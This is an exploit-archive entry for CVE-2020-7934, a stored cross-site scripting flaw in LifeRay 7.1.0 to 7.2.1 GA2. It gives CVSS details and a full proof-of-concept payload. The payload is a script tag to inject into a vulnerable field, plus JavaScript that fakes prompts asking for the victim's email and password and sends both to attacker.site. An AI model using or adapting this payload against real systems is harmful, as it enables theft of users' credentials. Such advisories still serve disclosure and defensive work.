LifeRay 7.2.1 GA2 Cross Site Scripting

2020.11.23
Credit: 3ndG4me
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS # Date: 10/05/2020 # Exploit Author: 3ndG4me # Vendor Homepage: https://www.liferay.com/ # Software Link: https://www.liferay.com/ # Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED) # Tested on: Debian Linux # CVE : CVE-2020-7934 # Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 # NOTE: The attached proof of concept is a javascript payload, submitted as a ".txt" file to attach via email as ".js" is often blocked. // CVE-2020-7934 Cred Phishing Example Attack // Author: 3ndG4me // Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 // Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant: // <SCRIPT SRC="//attacker.site/cve-2020-7934.js"> var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", ""); var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", ""); console.log(email); console.log(password); var url = "http://attacker.site/" + email + ":" + password; $.get(url);


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top